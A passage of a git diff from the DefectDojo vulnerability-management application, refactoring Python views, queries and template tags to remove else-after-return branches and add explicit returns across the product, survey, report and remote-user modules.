Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - - return product_api_scan_configurations diff --git a/dojo/product/views.py b/dojo/product/views.py index e887938d450..6680c2e5340 100644 --- a/dojo/product/views.py +++ b/dojo/product/views.py @@ -349,11 +349,10 @@ def identify_view(request): return view msg = 'invalid view, view must be "Endpoint" or "Finding"' raise ValueError(msg) - else: - if get_data.get("finding__severity", None): - return "Endpoint" - elif get_data.get("false_positive", None): - return "Endpoint" + if get_data.get("finding__severity", None): + return "Endpoint" + if get_data.get("false_positive", None): + return "Endpoint" referer = request.META.get("HTTP_REFERER", None) if referer: if referer.find("type=Endpoint") > -1: @@ -904,9 +903,8 @@ def new_product(request, ptid=None): if not error: return HttpResponseRedirect(reverse("view_product", args=(product.id,))) - else: - # engagement was saved, but JIRA errors, so goto edit_product - return HttpResponseRedirect(reverse("edit_product", args=(product.id,))) + # engagement was saved, but JIRA errors, so goto edit_product + return HttpResponseRedirect(reverse("edit_product", args=(product.id,))) else: if get_system_setting("enable_jira"): jira_project_form = JIRAProjectForm() @@ -1029,9 +1027,8 @@ def delete_product(request, pid): extra_tags="alert-success") logger.debug("delete_product: POST RETURN") return HttpResponseRedirect(reverse("product")) - else: - logger.debug("delete_product: POST INVALID FORM") - logger.error(form.errors) + logger.debug("delete_product: POST INVALID FORM") + logger.error(form.errors) logger.debug("delete_product: GET") @@ -1104,16 +1101,13 @@ def new_eng_for_app(request, pid, cicd=False): if not error: if "_Add Tests" in request.POST: return HttpResponseRedirect(reverse("add_tests", args=(engagement.id,))) - elif "_Import Scan Results" in request.POST: + if "_Import Scan Results" in request.POST: return HttpResponseRedirect(reverse("import_scan_results", args=(engagement.id,))) - else: - return HttpResponseRedirect(reverse("view_engagement", args=(engagement.id,))) - else: - # engagement was saved, but JIRA errors, so goto edit_engagement - logger.debug("new_eng_for_app: jira errors") - return HttpResponseRedirect(reverse("edit_engagement", args=(engagement.id,))) - else: - logger.debug(form.errors) + return HttpResponseRedirect(reverse("view_engagement", args=(engagement.id,))) + # engagement was saved, but JIRA errors, so goto edit_engagement + logger.debug("new_eng_for_app: jira errors") + return HttpResponseRedirect(reverse("edit_engagement", args=(engagement.id,))) + logger.debug(form.errors) else: form = EngForm(initial={"lead": request.user, "target_start": timezone.now().date(), "target_end": timezone.now().date() + timedelta(days=7), "product": product}, cicd=cicd, @@ -1223,8 +1217,7 @@ def add_meta_data(request, pid): extra_tags="alert-success") if "add_another" in request.POST: return HttpResponseRedirect(reverse("add_meta_data", args=(pid,))) - else: - return HttpResponseRedirect(reverse("view_product", args=(pid,))) + return HttpResponseRedirect(reverse("view_product", args=(pid,))) else: form = DojoMetaDataForm() @@ -1288,12 +1281,11 @@ def get_engagement(self, product: Product): def get_test(self, engagement: Engagement, test_type: Test_Type): if test := Test.objects.filter(engagement=engagement).first(): return test - else: - return Test.objects.create( - engagement=engagement, - test_type=test_type, - target_start=timezone.now(), - target_end=timezone.now()) + return Test.objects.create( + engagement=engagement, + test_type=test_type, + target_start=timezone.now(), + target_end=timezone.now()) def create_nested_objects(self, product: Product): engagement = self.get_engagement(product) @@ -1406,9 +1398,8 @@ def process_finding_form(self, request: HttpRequest, test: Test, context: dict): finding.save() return finding, request, True - else: - add_error_message_to_response("The form has errors, please correct them below.") - add_field_errors_to_response(context["form"]) + add_error_message_to_response("The form has errors, please correct them below.") + add_field_errors_to_response(context["form"]) return finding, request, False @@ -1451,8 +1442,7 @@ def process_jira_form(self, request: HttpRequest, finding: Finding, context: dic ) return request, True, push_to_jira - else: - add_field_errors_to_response(context["jform"]) + add_field_errors_to_response(context["jform"]) return request, False, False @@ -1464,8 +1454,7 @@ def process_github_form(self, request: HttpRequest, finding: Finding, context: d add_external_issue(finding, "github") return request, True - else: - add_field_errors_to_response(context["gform"]) + add_field_errors_to_response(context["gform"]) return request, False @@ -1537,10 +1526,8 @@ def post(self, request: HttpRequest, product_id: int): if success: if "_Finished" in request.POST: return HttpResponseRedirect(reverse("view_test", args=(test.id,))) - else: - return HttpResponseRedirect(reverse("add_findings", args=(test.id,))) - else: - context["form_error"] = True + return HttpResponseRedirect(reverse("add_findings", args=(test.id,))) + context["form_error"] = True # Render the form return render(request, self.get_template(), context) @@ -1720,8 +1707,7 @@ def edit_product_member(request, memberid): extra_tags="alert-success") if is_title_in_breadcrumbs("View User"): return HttpResponseRedirect(reverse("view_user", args=(member.user.id,))) - else: - return HttpResponseRedirect(reverse("view_product", args=(member.product.id,))) + return HttpResponseRedirect(reverse("view_product", args=(member.product.id,))) product_tab = Product_Tab(member.product, title=_("Edit Product Member"), tab="settings") return render(request, "dojo/edit_product_member.html", { "memberid": memberid, @@ -1745,11 +1731,9 @@ def delete_product_member(request, memberid): extra_tags="alert-success") if is_title_in_breadcrumbs("View User"): return HttpResponseRedirect(reverse("view_user", args=(member.user.id,))) - else: - if user == request.user: - return HttpResponseRedirect(reverse("product")) - else: - return HttpResponseRedirect(reverse("view_product", args=(member.product.id,))) + if user == request.user: + return HttpResponseRedirect(reverse("product")) + return HttpResponseRedirect(reverse("view_product", args=(member.product.id,))) product_tab = Product_Tab(member.product, title=_("Delete Product Member"), tab="settings") return render(request, "dojo/delete_product_member.html", { "memberid": memberid, @@ -1781,8 +1765,7 @@ def add_api_scan_configuration(request, pid): extra_tags="alert-success") if "add_another" in request.POST: return HttpResponseRedirect(reverse("add_api_scan_configuration", args=(pid,))) - else: - return HttpResponseRedirect(reverse("view_api_scan_configurations", args=(pid,))) + return HttpResponseRedirect(reverse("view_api_scan_configurations", args=(pid,))) except Exception as e: logger.exception(e) messages.add_message(request, @@ -1879,8 +1862,7 @@ def delete_api_scan_configuration(request, pid, pascid): _("API Scan Configuration deleted."), extra_tags="alert-success") return HttpResponseRedirect(reverse("view_api_scan_configurations", args=(pid,))) - else: - form = DeleteProduct_API_Scan_ConfigurationForm(instance=product_api_scan_configuration) + form = DeleteProduct_API_Scan_ConfigurationForm(instance=product_api_scan_configuration) product_tab = Product_Tab(get_object_or_404(Product, id=pid), title=_("Delete Tool Configuration"), tab="settings") return render(request, @@ -1914,8 +1896,7 @@ def edit_product_group(request, groupid): extra_tags="alert-success") if is_title_in_breadcrumbs("View Group"): return HttpResponseRedirect(reverse("view_group", args=(group.group.id,))) - else: - return HttpResponseRedirect(reverse("view_product", args=(group.product.id,))) + return HttpResponseRedirect(reverse("view_product", args=(group.product.id,))) product_tab = Product_Tab(group.product, title=_("Edit Product Group"), tab="settings") return render(request, "dojo/edit_product_group.html", { @@ -1940,10 +1921,9 @@ def delete_product_group(request, groupid): extra_tags="alert-success") if is_title_in_breadcrumbs("View Group"): return HttpResponseRedirect(reverse("view_group", args=(group.group.id,))) - else: - # TODO: If user was in the group that was deleted and no longer has access, redirect back to product listing - # page - return HttpResponseRedirect(reverse("view_product", args=(group.product.id,))) + # TODO: If user was in the group that was deleted and no longer has access, redirect back to product listing + # page + return HttpResponseRedirect(reverse("view_product", args=(group.product.id,))) product_tab = Product_Tab(group.product, title=_("Delete Product Group"), tab="settings") return render(request, "dojo/delete_product_group.html", { diff --git a/dojo/product_type/queries.py b/dojo/product_type/queries.py index 737584a5b05..5129cfd789b 100644 --- a/dojo/product_type/queries.py +++ b/dojo/product_type/queries.py @@ -35,9 +35,7 @@ def get_authorized_product_types(permission): product_types = Product_Type.objects.annotate( member=Exists(authorized_roles), authorized_group=Exists(authorized_groups)).order_by("name") - product_types = product_types.filter(Q(member=True) | Q(authorized_group=True)) - - return product_types + return product_types.filter(Q(member=True) | Q(authorized_group=True)) def get_authorized_members_for_product_type(product_type, permission): @@ -45,8 +43,7 @@ def get_authorized_members_for_product_type(product_type, permission): if user.is_superuser or user_has_permission(user, product_type, permission): return Product_Type_Member.objects.filter(product_type=product_type).order_by("user__first_name", "user__last_name").select_related("role", "product_type", "user") - else: - return None + return None def get_authorized_groups_for_product_type(product_type, permission): @@ -55,8 +52,7 @@ def get_authorized_groups_for_product_type(product_type, permission): if user.is_superuser or user_has_permission(user, product_type, permission): authorized_groups = get_authorized_groups(Permissions.Group_View) return Product_Type_Group.objects.filter(product_type=product_type, group__in=authorized_groups).order_by("group__name").select_related("role", "group") - else: - return None + return None def get_authorized_product_type_members(permission): diff --git a/dojo/product_type/views.py b/dojo/product_type/views.py index 302aa6dbbf9..63c38d8df4d 100644 --- a/dojo/product_type/views.py +++ b/dojo/product_type/views.py @@ -242,8 +242,7 @@ def edit_product_type_member(request, memberid): extra_tags="alert-warning") if is_title_in_breadcrumbs("View User"): return HttpResponseRedirect(reverse("view_user", args=(member.user.id, ))) - else: - return HttpResponseRedirect(reverse("view_product_type", args=(member.product_type.id, ))) + return HttpResponseRedirect(reverse("view_product_type", args=(member.product_type.id, ))) if member.role.is_owner and not user_has_permission(request.user, member.product_type, Permissions.Product_Type_Member_Add_Owner): messages.add_message(request, messages.WARNING, @@ -257,8 +256,7 @@ def edit_product_type_member(request, memberid): extra_tags="alert-success") if is_title_in_breadcrumbs("View User"): return HttpResponseRedirect(reverse("view_user", args=(member.user.id, ))) - else: - return HttpResponseRedirect(reverse("view_product_type", args=(member.product_type.id, ))) + return HttpResponseRedirect(reverse("view_product_type", args=(member.product_type.id, ))) add_breadcrumb(title=page_name, top_level=False, request=request) return render(request, "dojo/edit_product_type_member.html", { "name": page_name, @@ -292,11 +290,9 @@ def delete_product_type_member(request, memberid): extra_tags="alert-success") if is_title_in_breadcrumbs("View User"): return HttpResponseRedirect(reverse("view_user", args=(member.user.id, ))) - else: - if user == request.user: - return HttpResponseRedirect(reverse("product_type")) - else: - return HttpResponseRedirect(reverse("view_product_type", args=(member.product_type.id, ))) + if user == request.user: + return HttpResponseRedirect(reverse("product_type")) + return HttpResponseRedirect(reverse("view_product_type", args=(member.product_type.id, ))) add_breadcrumb(title=page_name, top_level=False, request=request) return render(request, "dojo/delete_product_type_member.html", { "name": page_name, @@ -365,8 +361,7 @@ def edit_product_type_group(request, groupid): extra_tags="alert-success") if is_title_in_breadcrumbs("View Group"): return HttpResponseRedirect(reverse("view_group", args=(group.group.id,))) - else: - return HttpResponseRedirect(reverse("view_product_type", args=(group.product_type.id,))) + return HttpResponseRedirect(reverse("view_product_type", args=(group.product_type.id,))) add_breadcrumb(title=page_name, top_level=False, request=request) return render(request, "dojo/edit_product_type_group.html", { @@ -392,10 +387,9 @@ def delete_product_type_group(request, groupid): extra_tags="alert-success") if is_title_in_breadcrumbs("View Group"): return HttpResponseRedirect(reverse("view_group", args=(group.group.id, ))) - else: - # TODO: If user was in the group that was deleted and no longer has access, redirect them to the product - # types page - return HttpResponseRedirect(reverse("view_product_type", args=(group.product_type.id, ))) + # TODO: If user was in the group that was deleted and no longer has access, redirect them to the product + # types page + return HttpResponseRedirect(reverse("view_product_type", args=(group.product_type.id, ))) add_breadcrumb(page_name, top_level=False, request=request) return render(request, "dojo/delete_product_type_group.html", { diff --git a/dojo/regulations/views.py b/dojo/regulations/views.py index f4d5004d074..e9a5f1a9f55 100644 --- a/dojo/regulations/views.py +++ b/dojo/regulations/views.py @@ -45,7 +45,7 @@ def edit_regulations(request, ttid): "Regulation Deleted.", extra_tags="alert-success") return HttpResponseRedirect(reverse("regulations")) - elif request.method == "POST": + if request.method == "POST": tform = RegulationForm(request.POST, instance=regulation) if tform.is_valid(): tform.save() diff --git a/dojo/remote_user.py b/dojo/remote_user.py index 44355d9f453..764af4e548b 100644 --- a/dojo/remote_user.py +++ b/dojo/remote_user.py @@ -20,32 +20,28 @@ def authenticate(self, request): self.header = settings.AUTH_REMOTEUSER_USERNAME_HEADER if self.header in request.META: return super().authenticate(request) - else: - return None - else: - logger.debug("Requested came from untrusted proxy %s; This is list of trusted proxies: %s", - IPAddress(request.META["REMOTE_ADDR"]), - settings.AUTH_REMOTEUSER_TRUSTED_PROXY) return None + logger.debug("Requested came from untrusted proxy %s; This is list of trusted proxies: %s", + IPAddress(request.META["REMOTE_ADDR"]), + settings.AUTH_REMOTEUSER_TRUSTED_PROXY) + return None class RemoteUserMiddleware(OriginalRemoteUserMiddleware): def process_request(self, request): if not settings.AUTH_REMOTEUSER_ENABLED: - return + return None # process only if request is comming from the trusted proxy node if IPAddress(request.META["REMOTE_ADDR"]) in settings.AUTH_REMOTEUSER_TRUSTED_PROXY: self.header = settings.AUTH_REMOTEUSER_USERNAME_HEADER if self.header in request.META: return super().process_request(request) - else: - return - else: - logger.debug("Requested came from untrusted proxy %s; This is list of trusted proxies: %s", - IPAddress(request.META["REMOTE_ADDR"]), - settings.AUTH_REMOTEUSER_TRUSTED_PROXY) - return + return None + logger.debug("Requested came from untrusted proxy %s; This is list of trusted proxies: %s", + IPAddress(request.META["REMOTE_ADDR"]), + settings.AUTH_REMOTEUSER_TRUSTED_PROXY) + return None class PersistentRemoteUserMiddleware(RemoteUserMiddleware): diff --git a/dojo/reports/views.py b/dojo/reports/views.py index ca13eae54ca..aacf4369333 100644 --- a/dojo/reports/views.py +++ b/dojo/reports/views.py @@ -122,8 +122,7 @@ def post(self, request: HttpRequest) -> HttpResponse: if form.is_valid(): self._set_state(request) return render(request, self.get_template(), self.get_context()) - else: - raise PermissionDenied + raise PermissionDenied def _set_state(self, request: HttpRequest): self.request = request @@ -154,8 +153,7 @@ def get_form(self, request): def get_template(self): if self.report_format == "HTML": return "dojo/custom_html_report.html" - else: - raise PermissionDenied + raise PermissionDenied def get_context(self): return { @@ -310,8 +308,7 @@ def product_endpoint_report(request, pid): "user": request.user, "title": "Generate Report", }) - else: - raise Http404 + raise Http404 product_tab = Product_Tab(product, "Product Endpoint Report", tab="endpoints") return render(request, @@ -351,9 +348,8 @@ def generate_report(request, obj, host_view=False): if obj is None: msg = "No object is given to generate report for" raise Exception(msg) - else: - msg = f"Report cannot be generated for object of type {type(obj).__name__}" - raise Exception(msg) + msg = f"Report cannot be generated for object of type {type(obj).__name__}" + raise Exception(msg) report_format = request.GET.get("report_type", "HTML") include_finding_notes = int(request.GET.get("include_finding_notes", 0)) @@ -584,8 +580,7 @@ def generate_report(request, obj, host_view=False): "context": context, }) - else: - raise Http404 + raise Http404 paged_findings = get_page_items(request, findings.qs.distinct().order_by("numerical_severity"), 25) product_tab = None @@ -654,9 +649,8 @@ def get_findings(request): if not url: msg = "Please use the report button when viewing findings" raise Http404(msg) - else: - if url.startswith("url="): - url = url[4:] + if url.startswith("url="): + url = url[4:] views = ["all", "open", "inactive", "verified", "closed", "accepted", "out_of_scope", diff --git a/dojo/risk_acceptance/helper.py b/dojo/risk_acceptance/helper.py index a1d628b33df..3ebbe9bf6a4 100644 --- a/dojo/risk_acceptance/helper.py +++ b/dojo/risk_acceptance/helper.py @@ -201,16 +201,14 @@ def accepted_message_creator(risk_acceptance, heads_up_days=0): escape_for_jira(risk_acceptance.name), get_full_url(reverse("view_risk_acceptance", args=(risk_acceptance.engagement.id, risk_acceptance.id))), len(risk_acceptance.accepted_findings.all()), timezone.localtime(risk_acceptance.expiration_date).strftime("%b %d, %Y")) - else: - return "Finding has been risk accepted" + return "Finding has been risk accepted" def unaccepted_message_creator(risk_acceptance, heads_up_days=0): if risk_acceptance: return "finding was unaccepted/deleted from risk acceptance [({})|{}]".format(escape_for_jira(risk_acceptance.name), get_full_url(reverse("view_risk_acceptance", args=(risk_acceptance.engagement.id, risk_acceptance.id)))) - else: - return "Finding is no longer risk accepted" + return "Finding is no longer risk accepted" def post_jira_comment(finding, message_factory, heads_up_days=0): diff --git a/dojo/risk_acceptance/queries.py b/dojo/risk_acceptance/queries.py index 9cbf89fb5c2..72282af21e7 100644 --- a/dojo/risk_acceptance/queries.py +++ b/dojo/risk_acceptance/queries.py @@ -39,8 +39,6 @@ def get_authorized_risk_acceptances(permission): product__member=Exists(authorized_product_roles), product__prod_type__authorized_group=Exists(authorized_product_type_groups), product__authorized_group=Exists(authorized_product_groups)).order_by("id") - risk_acceptances = risk_acceptances.filter( + return risk_acceptances.filter( Q(product__prod_type__member=True) | Q(product__member=True) | Q(product__prod_type__authorized_group=True) | Q(product__authorized_group=True)) - - return risk_acceptances diff --git a/dojo/search/views.py b/dojo/search/views.py index 3e3a75923ca..604e9ecd68c 100644 --- a/dojo/search/views.py +++ b/dojo/search/views.py @@ -31,6 +31,45 @@ def simple_search(request): + + """ + query: some keywords + operators: {} + keywords: ['some', 'keywords'] + + query: some key-word + operators: {} + keywords: ['some', 'key-word'] + + query: keyword with "space inside" + operators: {} + keywords: ['keyword', 'with', 'space inside'] + + query: tag:anchore word tags:php + operators: {'tag': ['anchore'], 'tags': ['php']} + keywords: ['word'] + + query: tags:php,magento + operators: {'tags': ['php,magento']} + keywords: [] + + query: tags:php tags:magento + operators: {'tags': ['php', 'magento']} + keywords: [] + + query: tags:"php, magento" + operators: {'tags': ['php, magento']} + keywords: [] + + query: tags:anchorse some "space inside" + operators: {'tags': ['anchorse']} + keywords: ['some', 'space inside'] + + query: tags:anchore vulnerability_id:CVE-2020-1234 jquery + operators: {'tags': ['anchore'], 'vulnerability_id': ['CVE-2020-1234']} + keywords: ['jquery'] + """ + tests = None findings = None finding_templates = None @@ -364,44 +403,6 @@ def simple_search(request): response.delete_cookie("highlight", path="/") return response - """ - query: some keywords - operators: {} - keywords: ['some', 'keywords'] - - query: some key-word - operators: {} - keywords: ['some', 'key-word'] - - query: keyword with "space inside" - operators: {} - keywords: ['keyword', 'with', 'space inside'] - - query: tag:anchore word tags:php - operators: {'tag': ['anchore'], 'tags': ['php']} - keywords: ['word'] - - query: tags:php,magento - operators: {'tags': ['php,magento']} - keywords: [] - - query: tags:php tags:magento - operators: {'tags': ['php', 'magento']} - keywords: [] - - query: tags:"php, magento" - operators: {'tags': ['php, magento']} - keywords: [] - - query: tags:anchorse some "space inside" - operators: {'tags': ['anchorse']} - keywords: ['some', 'space inside'] - - query: tags:anchore vulnerability_id:CVE-2020-1234 jquery - operators: {'tags': ['anchore'], 'vulnerability_id': ['CVE-2020-1234']} - keywords: ['jquery'] - """ - # it's not google grade parsing, but let's do some basic stuff right def parse_search_query(clean_query): @@ -448,8 +449,7 @@ def vulnerability_id_fix(keyword): if vulnerability_ids: return " ".join(vulnerability_ids) - else: - return keyword + return keyword def apply_tag_filters(qs, operators, skip_relations=False): diff --git a/dojo/sla_config/views.py b/dojo/sla_config/views.py index f95461283fa..c07e8dadc2a 100644 --- a/dojo/sla_config/views.py +++ b/dojo/sla_config/views.py @@ -56,14 +56,13 @@ def edit_sla_config(request, slaid): "SLA Configuration Deleted.", extra_tags="alert-success") return HttpResponseRedirect(reverse("sla_config")) - else: - messages.add_message(request, - messages.ERROR, - "The Default SLA Configuration cannot be deleted.", - extra_tags="alert-danger") - return HttpResponseRedirect(reverse("sla_config")) + messages.add_message(request, + messages.ERROR, + "The Default SLA Configuration cannot be deleted.", + extra_tags="alert-danger") + return HttpResponseRedirect(reverse("sla_config")) - elif request.method == "POST": + if request.method == "POST": form = SLAConfigForm(request.POST, instance=sla_config) if form.is_valid(): form.save(commit=True) diff --git a/dojo/survey/views.py b/dojo/survey/views.py index 29b4a2fc81d..d83803f2efd 100644 --- a/dojo/survey/views.py +++ b/dojo/survey/views.py @@ -77,12 +77,11 @@ def delete_engagement_survey(request, eid, sid): "Questionnaire deleted successfully.", extra_tags="alert-success") return HttpResponseRedirect(reverse("view_engagement", args=(engagement.id, ))) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to delete Questionnaire.", - extra_tags="alert-danger") + messages.add_message( + request, + messages.ERROR, + "Unable to delete Questionnaire.", + extra_tags="alert-danger") add_breadcrumb( title="Delete " + survey.survey.name + " Questionnaire", @@ -145,12 +144,11 @@ def answer_questionnaire(request, eid, sid): "Successfully answered, all answers valid.", extra_tags="alert-success") return HttpResponseRedirect(reverse("view_engagement", args=(engagement.id, ))) - else: - messages.add_message( - request, - messages.ERROR, - "Questionnaire has errors, please correct.", - extra_tags="alert-danger") + messages.add_message( + request, + messages.ERROR, + "Questionnaire has errors, please correct.", + extra_tags="alert-danger") add_breadcrumb( title="Answer " + survey.survey.name + " Survey", top_level=False, @@ -243,12 +241,11 @@ def add_questionnaire(request, eid): if "respond_survey" in request.POST: return HttpResponseRedirect(reverse("answer_questionnaire", args=(eid, survey.id))) return HttpResponseRedirect(reverse("view_engagement", args=(eid,))) - else: - messages.add_message( - request, - messages.ERROR, - "Questionnaire could not be added.", - extra_tags="alert-danger") + messages.add_message( + request, + messages.ERROR, + "Questionnaire could not be added.", + extra_tags="alert-danger") form.fields["survey"].queryset = surveys add_breadcrumb(title="Add Questionnaire", top_level=False, request=request) @@ -290,12 +287,11 @@ def edit_questionnaire(request, sid): "Questionnaire successfully updated, you may now add/edit questions.", extra_tags="alert-success") return HttpResponseRedirect(reverse("edit_questionnaire", args=(survey.id,))) - else: - messages.add_message( - request, - messages.SUCCESS, - "No changes detected, questionnaire not updated.", - extra_tags="alert-warning") + messages.add_message( + request, + messages.SUCCESS, + "No changes detected, questionnaire not updated.", + extra_tags="alert-warning") if "add_questions" in request.POST: return HttpResponseRedirect(reverse("edit_questionnaire_questions", args=(survey.id,))) else: @@ -360,14 +356,12 @@ def create_questionnaire(request): extra_tags="alert-success") if "add_questions" in request.POST: return HttpResponseRedirect(reverse("edit_questionnaire_questions", args=(survey.id,))) - else: - return HttpResponseRedirect(reverse("questionnaire")) - else: - messages.add_message( - request, - messages.ERROR, - "Please correct any errors displayed below.", - extra_tags="alert-danger") + return HttpResponseRedirect(reverse("questionnaire")) + messages.add_message( + request, + messages.ERROR, + "Please correct any errors displayed below.", + extra_tags="alert-danger") add_breadcrumb(title="Create Questionnaire", top_level=False, request=request) return render(request, "defectDojo-engagement-survey/create_questionnaire.html", { @@ -411,12 +405,11 @@ def edit_questionnaire_questions(request, sid): "Questionnaire questions successfully saved.", extra_tags="alert-success") return HttpResponseRedirect(reverse("questionnaire")) - else: - messages.add_message( - request, - messages.ERROR, - "Questionnaire questions not saved, please correct any errors displayed below.", - extra_tags="alert-success") + messages.add_message( + request, + messages.ERROR, + "Questionnaire questions not saved, please correct any errors displayed below.", + extra_tags="alert-success") add_breadcrumb(title="Update Questionnaire Questions", top_level=False, request=request) return render(request, "defectDojo-engagement-survey/edit_survey_questions.html", { @@ -488,8 +481,7 @@ def create_question(request): "Text Question added successfully.", extra_tags="alert-success") return HttpResponseRedirect(reverse("questions")) - else: - error = True + error = True elif type == "choice": if choiceQuestionFrom.is_valid(): @@ -511,8 +503,7 @@ def create_question(request): "Choice Question added successfully.", extra_tags="alert-success") return HttpResponseRedirect(reverse("questions")) - else: - error = True + error = True if "_popup" in request.GET and not error: resp = f'' @@ -638,12 +629,11 @@ def add_empty_questionnaire(request): if "respond_survey" in request.POST: return HttpResponseRedirect(reverse("dashboard")) return HttpResponseRedirect(reverse("questionnaire")) - else: - messages.add_message( - request, - messages.ERROR, - "Questionnaire could not be added.", - extra_tags="alert-danger") + messages.add_message( + request, + messages.ERROR, + "Questionnaire could not be added.", + extra_tags="alert-danger") form.fields["survey"].queryset = surveys add_breadcrumb(title="Add Empty Questionnaire", top_level=False, request=request) @@ -695,12 +685,11 @@ def delete_empty_questionnaire(request, esid): "Questionnaire deleted successfully.", extra_tags="alert-success") return HttpResponseRedirect(reverse("survey")) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to delete Questionnaire.", - extra_tags="alert-danger") + messages.add_message( + request, + messages.ERROR, + "Unable to delete Questionnaire.", + extra_tags="alert-danger") add_breadcrumb( title="Delete " + survey.survey.name + " Questionnaire", @@ -731,12 +720,11 @@ def delete_general_questionnaire(request, esid): "Questionnaire deleted successfully.", extra_tags="alert-success") return HttpResponseRedirect(reverse("questionnaire")) - else: - messages.add_message( - request, - messages.ERROR, - "Unable to delete questionnaire.", - extra_tags="alert-danger") + messages.add_message( + request, + messages.ERROR, + "Unable to delete questionnaire.", + extra_tags="alert-danger") add_breadcrumb( title="Delete " + survey.survey.name + " Questionnaire", @@ -815,12 +803,11 @@ def answer_empty_survey(request, esid): extra_tags="alert-success") return HttpResponseRedirect( reverse("dashboard")) - else: - messages.add_message( - request, - messages.ERROR, - "Questionnaire has errors, please correct.", - extra_tags="alert-danger") + messages.add_message( + request, + messages.ERROR, + "Questionnaire has errors, please correct.", + extra_tags="alert-danger") add_breadcrumb( title="Answer Empty " + engagement_survey.name + " Questionnaire", top_level=False, @@ -857,12 +844,11 @@ def engagement_empty_survey(request, esid): "Engagement created and questionnaire successfully linked.", extra_tags="alert-success") return HttpResponseRedirect(reverse("edit_engagement", args=(engagement.id, ))) - else: - messages.add_message( - request, - messages.ERROR, - "Questionnaire could not be added.", - extra_tags="alert-danger") + messages.add_message( + request, + messages.ERROR, + "Questionnaire could not be added.", + extra_tags="alert-danger") add_breadcrumb( title="Link Questionnaire to new Engagement", top_level=False, diff --git a/dojo/system_settings/views.py b/dojo/system_settings/views.py index 3690201a050..4c952d57a0f 100644 --- a/dojo/system_settings/views.py +++ b/dojo/system_settings/views.py @@ -116,7 +116,7 @@ def get_celery_status( context["celery_msg"] = "Celery needs to have the setting CELERY_RESULT_BACKEND = 'db+sqlite:///dojo.celeryresults.sqlite' set in settings.py." context["celery_status"] = "Unknown" - return None + return def get_template(self) -> str: return "dojo/system_settings.html" diff --git a/dojo/tags_signals.py b/dojo/tags_signals.py index f7e09fa9b0c..605996a602c 100644 --- a/dojo/tags_signals.py +++ b/dojo/tags_signals.py @@ -77,3 +77,4 @@ def get_product(instance): return instance.engagement.product if isinstance(instance, Finding): return instance.test.engagement.product + return None diff --git a/dojo/templatetags/display_tags.py b/dojo/templatetags/display_tags.py index bd0497a6f38..483e16fe4f2 100644 --- a/dojo/templatetags/display_tags.py +++ b/dojo/templatetags/display_tags.py @@ -87,6 +87,7 @@ def markdown_render(value): "markdown.extensions.toc", "markdown.extensions.tables"]) return mark_safe(bleach.clean(markdown_text, tags=markdown_tags, attributes=markdown_attrs, css_sanitizer=markdown_styles)) + return None def text_shortener(value, length): @@ -368,8 +369,7 @@ def overdue(date1): def notspecified(text): if text: return text - else: - return mark_safe('Not Specified') + return mark_safe('Not Specified') @register.tag @@ -510,32 +510,29 @@ def business_criticality_icon(value): return mark_safe(stars(1, 5, "Very Low")) if value == Product.NONE_CRITICALITY: return mark_safe(stars(0, 5, "None")) - else: - return "" # mark_safe(not_specified_icon('Business Criticality Not Specified')) + return "" # mark_safe(not_specified_icon('Business Criticality Not Specified')) @register.filter def last_value(value): if "/" in value: return value.rsplit("/")[-1:][0] - else: - return value + return value @register.filter def platform_icon(value): if value == Product.WEB_PLATFORM: return mark_safe(icon("list-alt", "Web")) - elif value == Product.DESKTOP_PLATFORM: + if value == Product.DESKTOP_PLATFORM: return mark_safe(icon("desktop", "Desktop")) - elif value == Product.MOBILE_PLATFORM: + if value == Product.MOBILE_PLATFORM: return mark_safe(icon("mobile", "Mobile")) - elif value == Product.WEB_SERVICE_PLATFORM: + if value == Product.WEB_SERVICE_PLATFORM: return mark_safe(icon("plug", "Web Service")) - elif value == Product.IOT: + if value == Product.IOT: return mark_safe(icon("random", "Internet of Things")) - else: - return "" # mark_safe(not_specified_icon('Platform Not Specified')) + return "" # mark_safe(not_specified_icon('Platform Not Specified')) @register.filter @@ -546,8 +543,7 @@ def lifecycle_icon(value): return mark_safe(icon("ship", "Sustain")) if value == Product.RETIREMENT: return mark_safe(icon("moon-o", "Retire")) - else: - return "" # mark_safe(not_specified_icon('Lifecycle Not Specified')) + return "" # mark_safe(not_specified_icon('Lifecycle Not Specified')) @register.filter @@ -564,24 +560,21 @@ def origin_icon(value): return mark_safe(icon("code", "Open Source")) if value == Product.OUTSOURCED_ORIGIN: return mark_safe(icon("globe", "Outsourced")) - else: - return "" # mark_safe(not_specified_icon('Origin Not Specified')) + return "" # mark_safe(not_specified_icon('Origin Not Specified')) @register.filter def external_audience_icon(value): if value: return mark_safe(icon("users", "External Audience")) - else: - return "" + return "" @register.filter def internet_accessible_icon(value): if value: return mark_safe(icon("cloud", "Internet Accessible")) - else: - return "" + return "" @register.filter @@ -708,9 +701,7 @@ def get_severity_count(id, table): elif table == "product": display_counts.append("Total: " + str(total) + " Active Findings") - display_counts = ", ".join([str(item) for item in display_counts]) - - return display_counts + return ", ".join([str(item) for item in display_counts]) @register.filter @@ -798,8 +789,7 @@ def first_vulnerability_id(finding): vulnerability_ids = finding.vulnerability_ids if vulnerability_ids: return vulnerability_ids[0] - else: - return None + return None @register.filter @@ -810,8 +800,7 @@ def additional_vulnerability_ids(finding): for vulnerability_id in vulnerability_ids[1:]: references.append(vulnerability_id) return references - else: - return None + return None @register.filter diff --git a/dojo/templatetags/event_tags.py b/dojo/templatetags/event_tags.py index 2b40868a049..ff1ffe8f068 100644 --- a/dojo/templatetags/event_tags.py +++ b/dojo/templatetags/event_tags.py @@ -80,7 +80,6 @@ def nice_title(title): pat = re.compile(r"Finding [0-9][0-9][0-9]:*") s = pat.split(title, 2) try: - ret = s[1] - return ret + return s[1] except: return title diff --git a/dojo/templatetags/get_attribute.py b/dojo/templatetags/get_attribute.py index 49f98941df0..34e06a216c0 100644 --- a/dojo/templatetags/get_attribute.py +++ b/dojo/templatetags/get_attribute.py @@ -8,5 +8,4 @@ def get_attribute(obj, name): if hasattr(obj, name): return getattr(obj, name) - else: - return "" + return "" diff --git a/dojo/templatetags/get_banner.py b/dojo/templatetags/get_banner.py index 26ab7d3bbe8..47465aa6c22 100644 --- a/dojo/templatetags/get_banner.py +++ b/dojo/templatetags/get_banner.py @@ -22,9 +22,7 @@ def get_banner_conf(attribute): value, attributes=allowed_attributes, css_sanitizer=CSSSanitizer(allowed_css_properties=["color", "font-weight"]))) - else: - return value - else: - return False + return value + return False except Exception: return False diff --git a/dojo/templatetags/get_config_setting.py b/dojo/templatetags/get_config_setting.py index 